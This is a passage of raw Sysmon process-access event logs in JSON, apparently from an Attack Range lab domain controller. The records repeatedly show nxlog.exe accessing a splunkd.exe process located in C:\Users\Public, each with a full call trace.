(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:40.530","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:41.530\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:41.530","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:42.530\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:42.530","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:43.530\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:43.530","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:44.531\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:44.531","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:45.531\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:45.531","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:46.531\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:46.531","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 